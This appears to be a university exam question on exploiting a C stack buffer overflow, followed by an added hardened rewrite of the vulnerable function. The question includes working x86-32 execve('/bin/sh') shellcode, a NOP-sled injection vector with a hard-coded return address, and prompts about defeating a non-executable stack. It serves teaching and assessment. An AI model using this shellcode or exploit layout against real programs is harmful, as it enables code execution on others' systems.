Question


3. Consider the following C code fragment and assume the program name is fixed to vuln, it is invoked as ./vuln (i.e., argv[0]) and cannot be changed by an attacker.

    int
    main (int argc, char **argv)
    {
      if (argv[1])
        return foo (argv[1]);
      else
        return foo (argv[0]);
    }

    int
    foo (char *arg)
    {
      char bar[128];

      if (sizeof(arg) > 128) {
        strcpy(bar, arg);

        // never return to main
        exit (0);
      }

      strcpy(bar, arg);

      return strlen (bar);
    }

a. Does the program suffer from a memory corruption vulnerability? If not, explain the reasons. If yes, explain the reasons and how it is possible to successfully exploit this vulnerability. In other words, is it possible to provide specific input to such a program to take advantage of its vulnerability and thus execute arbitrary code (for instance, spawning a shell), on x86-32 architectures? If yes, explain how you would exploit it (high-level steps, including what input and size you should provide). If not, explain why and what you would change in the code to make it exploitable. [5 marks]

b. Assuming that the above code is vulnerable (or can be modified to become vulnerable) and that the vulnerability can be successfully exploited (or can be modified to be exploited), then consider the following x86 assembly code fragment, which may be used to exploit the previous vulnerability:

    int
    main (void)
    {
      __asm__(
        "jmp ahead              \n"
        "back:                  \n"
        "  popl %ebx            \n"
        "  movl %ebx, 0x8(%ebx) \n"
        "  xorl %eax, %eax      \n"
        "  movb %al, 0x7(%ebx)  \n"
        "  movl %eax, 0xc(%ebx) \n"
        "  movl %eax, %edx      \n"
        "  movl $0xb, %eax      \n"
        "  movl 0xc(%ebx), %ecx \n"
        "  int $0x80            \n"
        "ahead:                 \n"
        "  call back            \n"
        "  .string \"/bin/sh\"  \n"
      );
    }

   i. Assuming the above assembly snippet (shown in Question 3 (b)) is placed on the stack, what does the assembly code do? Add comments to each line and explain its semantics in the context of the shellcode. For instance, the instruction mov $0xb, %eax copies the constant value 0xb into the register %eax. This represents the index that refers to the system call execve. [12 marks]

   ii. An attacker creates a suitable injection vector to exploit the aforementioned memory error. To this end, he places the shellcode in the injection vector, pads it with his initials so as to create a message long enough to overflow bar; then the attacker adds the appropriate address at the right place and terminates the message with a NULL ('\0'). In other words, the injection vector looks as follows:

       +----------+-----------+------------+----+
       | nop sled | shellcode | 0xbfff1234 | \0 |
       +----------+-----------+------------+----+

   Next, he runs the program giving this injection vector to it as its first argument. To his surprise, the attack fails. He asks you for help. State why the attack cannot work. [2 marks]

   iii. Show how the shellcode can be modified to make the attack possible. (Note: don't worry if you do not know the exact syntax of instructions; marks will be awarded for a clear explanation.) [2 marks]

c. Assume the code shown at the beginning of the question is vulnerable (or can be modified to be so) and the vulnerability can be successfully exploited. State and describe what technique(s) an attacker would use to exploit the vulnerability shown at the beginning of the question, if the kernel enforces a non-executable stack protection (again, assume the small program shown at the beginning of the question is exploitable or can be modified to be exploited successfully). [4 marks]
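The following is an added example, not part of the question or of any posted answer. It shows what the sizeof(arg) guard in foo() actually evaluates to, and puts a bounded replacement for foo() beside it that rejects any argument that would not fit in bar. BAR_SIZE, foo_safe and foo_safe_on_run_of are names chosen here, and the run of 'A' bytes is constructed input.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BAR_SIZE 128

/* The guard in the question tests sizeof(arg), which is the size of a
 * char* (4 bytes on x86-32, 8 on x86-64), never the length of the string
 * arg points to. This helper returns what that guard evaluates to. */
int original_guard_fires(void)
{
    char *arg = NULL;                 /* same type as the question's parameter */
    return sizeof(arg) > BAR_SIZE;    /* always 0: the branch is dead code */
}

/* Hardened foo(): look for the terminator within the first BAR_SIZE bytes;
 * if there is none the string cannot fit, so refuse to copy at all. */
int foo_safe(const char *arg)
{
    char bar[BAR_SIZE];
    const char *nul = memchr(arg, '\0', BAR_SIZE);
    if (nul == NULL)
        return -1;                    /* would overflow bar: reject the input */
    size_t len = (size_t)(nul - arg); /* len <= BAR_SIZE - 1 */
    memcpy(bar, arg, len + 1);        /* copies the NUL; bounded by the check */
    return (int)strlen(bar);
}

/* Constructed input: a string of n 'A' bytes, the shape an over-long argv[1]
 * would have. Returns foo_safe()'s result, or -2 on allocation failure. */
int foo_safe_on_run_of(size_t n)
{
    char *buf = malloc(n + 1);
    if (buf == NULL)
        return -2;
    memset(buf, 'A', n);
    buf[n] = '\0';
    int r = foo_safe(buf);
    free(buf);
    return r;
}

int main(void)
{
    printf("original guard fires: %d\n", original_guard_fires());
    printf("127 bytes -> %d, 128 bytes -> %d, 4096 bytes -> %d\n",
           foo_safe_on_run_of(127), foo_safe_on_run_of(128),
           foo_safe_on_run_of(4096));
    return 0;
}
```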
